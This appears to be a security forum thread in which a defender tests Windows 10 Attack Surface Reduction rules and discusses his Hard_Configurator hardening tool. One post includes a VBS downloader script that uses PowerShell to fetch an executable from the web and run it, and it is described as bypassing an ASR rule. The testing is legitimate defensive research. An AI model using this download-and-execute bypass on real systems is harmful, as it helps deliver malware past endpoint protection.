Andy Ful

Level 33
Content Creator
Verified
Joined
Dec 23, 2014
Messages
2,233
Operating System
Windows 10
Antivirus
Windows Defender

Andy Ful

Level 33
Content Creator
Verified
Joined
Dec 23, 2014
Messages
2,233
Operating System
Windows 10
Antivirus
Windows Defender
It seems that the Attack Surface Reduction introduced in Windows 10 Fall Creators Update works also in Windows Home version. It can be configured when using PowerShell.
The bad news is that the rule 'Block Office applications from creating child processes' does not work with Microsoft Office 2007 and Open Office. It works well with Microsoft Office 2016.
So it is possible, that the below ASR features:
  • Block Office applications from creating child processes
  • Block Office applications from creating executable content
  • Block Office applications from injecting into other processes
  • Block Win32 imports from Macro code in Office
will work only with the office software still supported by Microsoft (MS Office 2010, 2013, 2016).
Unfortunately, I cannot test it for MS Office 2010 and MS Office 2013. I someone can then please let me know.
Here is the link to docs.microsoft.com article:
Use Attack surface reduction rules to prevent malware infection
It follows from it, that ASR applies to:
  • Windows 10, version 1709 (and later)
  • Microsoft Office 365
  • Microsoft Office 2016
  • Microsoft Office 2013
  • Microsoft Office 2010
The bad thing is that also the ASR rule 'Impede JavaScript and VBScript to launch executables' seems not working outside Microsoft Office.
After setting the ASR rules:
Code:
Set-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550,D4F940AB-401B-4EFC-AADC-AD5F3C50688A,3B576869-A4EC-4529-8536-B80A7769E899,75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84,D3E037E1-3EB8-44C8-A917-57927947596D,5BEB7EFE-FD9A-4556-801D-275E5FFC04CC,92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Enabled,Enabled,Enabled,Enabled,Enabled,Enabled,Enabled
I can still run successfully eso.exe via the simple RunEso.vbs script:
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\z\eso.exe")
WScript.Quit
 

Andy Ful

Level 33
Content Creator
Verified
Joined
Dec 23, 2014
Messages
2,233
Operating System
Windows 10
Antivirus
Windows Defender
Here is the link to docs.microsoft.com article:
Use Attack surface reduction rules to prevent malware infection
It follows from it, that ASR applies to:
  • Windows 10, version 1709 (and later)
  • Microsoft Office 365
  • Microsoft Office 2016
  • Microsoft Office 2013
  • Microsoft Office 2010
The bad thing is that also the ASR rule 'Impede JavaScript and VBScript to launch executables' seems not working outside Microsoft Office.
After setting the ASR rules:
Code:
Set-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550,D4F940AB-401B-4EFC-AADC-AD5F3C50688A,3B576869-A4EC-4529-8536-B80A7769E899,75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84,D3E037E1-3EB8-44C8-A917-57927947596D,5BEB7EFE-FD9A-4556-801D-275E5FFC04CC,92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Enabled,Enabled,Enabled,Enabled,Enabled,Enabled,Enabled
I can still run successfully eso.exe via the simple RunEso.vbs script:
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\z\eso.exe")
WScript.Quit
In fact the ASR rule 'Impede JavaScript and VBScript to launch executables' has also another more appropriate description: 'Block JavaScript or VBScript from launching downloaded executable content'.
.
So, it cannot block the script from executing files that are already on the disk, but can block some script trojan downloaders. That feature works independently of Microsoft Office.
The bad thing is that I managed to bypass this ASR rule using the VBS script trojan downloader:
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://kcsoftwares.com/files/sumo_lite.exe','C:\Users\Public\Downloads\sumo_lite.exe')")
WScript.Sleep(10000)
WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
WScript.Quit
The downloaded/executed file is a harmless SUMO lite installer from the developer site. The analogical script without using PowerShell is blocked by ASR (no file is downloaded).
Poll - Who has already played with new W10 security features?
:rolleyes:(n)
 
Last edited:

Andy Ful

Level 33
Content Creator
Verified
Joined
Dec 23, 2014
Messages
2,233
Operating System
Windows 10
Antivirus
Windows Defender
How can the average user of Hard Config keep notified about new versions?
I am on v. 3.1.0.0
The problem is that Hard_Configurator do not look outside from the computer (no external connections). I was thinking about adding a <Check for updates button>. That option could check for the program new versions.:)
 

Andy Ful

Level 33
Content Creator
Verified
Joined
Dec 23, 2014
Messages
2,233
Operating System
Windows 10
Antivirus
Windows Defender
I am working now on Hard_Configurator extension, the tool to configure Windows Defender on Windows 10 FCU home versions (ASR rules + exclusions). It contains the rules used by @Av Gurus (16 rules + ASR rules), but cannot be used on Windows Pro, because PowerShell set-MpPreference cmdlet used to apply those settings can be overridden by existent Defender Group Policy rules. I have to solve this issue, because this tool is far more convenient than using gpedit.msc .
 

steel9

Level 4
Verified
Joined
Jun 23, 2017
Messages
179
Operating System
Windows 10
Antivirus
Kaspersky
Any plans to release the source code on GitHub? I mean for people worried about downloading unsigned applications xD
 
Likes: AtlBo

Andy Ful

Level 33
Content Creator
Verified
Joined
Dec 23, 2014
Messages
2,233
Operating System
Windows 10
Antivirus
Windows Defender
Any plans to release the source code on GitHub? I mean for people worried about downloading unsigned applications xD
Here is the link:
Hard_Configurator---old-versions/Hard_Configurator_3.1.0.0_sources.zip at master · AndyFul/Hard_Configurator---old-versions · GitHub
The Hard_Configurator folder must be copied to Windows folder!!!. One can compile the executable manually using AutoIt - only the file Hard_Configurator.au3 has to be compiled, the rest is added during the compilation process.
.
The code is not properly commented and is not optimized. It also uses some opensource functions made by the members of AutoIt Forums , (Ascend4nt, Erik Pilsits, FredAI, Melba23, trancexx, Valuater).
 
Last edited:
Joined
Jun 12, 2017
Messages
24
I've been following your work on Hard_Configurator for some time and have been using SRP on Pro versions of Windows since Vista Days. My "mentor" with SRP was mechBgon, an early detailer of how to set up SRP. Never had any known malware since. While your work seems to be towards using H_C on Home versions, I was wondering if it is applicable for Pro versions as well? I was toying with trying it on a Pro version in place of my custom mechBgon installs. Would it work? Your thoughts.
 

Andy Ful

Level 33
Content Creator
Verified
Joined
Dec 23, 2014
Messages
2,233
Operating System
Windows 10
Antivirus
Windows Defender
I've been following your work on Hard_Configurator for some time and have been using SRP on Pro versions of Windows since Vista Days. My "mentor" with SRP was mechBgon, an early detailer of how to set up SRP. Never had any known malware since. While your work seems to be towards using H_C on Home versions, I was wondering if it is applicable for Pro versions as well? I was toying with trying it on a Pro version in place of my custom mechBgon installs. Would it work? Your thoughts.
The SRP part of Hard_Configurator will work, but you have reset SRP:
  1. Use gpedit.msc to remove SRP from GPO.
  2. If you configured SRP when not using Group Policies (SSRP or reg tweaks), then simply press <Recommended SRP> button in Hard_Configurator.
The problem with other GPO settings is that they are refreshed in the Registry every day. This can overwrite the Hard_Configurator settings. Simply look at the Hard_Configurator settings after a day or two. If any setting will change its value, then it is the sign that you already activated this setting in GPO. If so, then it should be set to unconfigured state. If you will have any problem, just post here.:)
 

steel9

Level 4
Verified
Joined
Jun 23, 2017
Messages
179
Operating System
Windows 10
Antivirus
Kaspersky
The x86 installer was detected as malware by multiple scanners. I submitted false positive reports to some of them, but according to Avast it was not a false positive.

"
Hello,

Thank you for reporting this.

Our virus specialists have confirmed that this detection is indeed correct due to lack of compliance with our clean software policy.

You can find further details in the following article: Avast Clean Guidelines.


With regards,

Avast Customer Care
"

I asked them why, but they haven't responded yet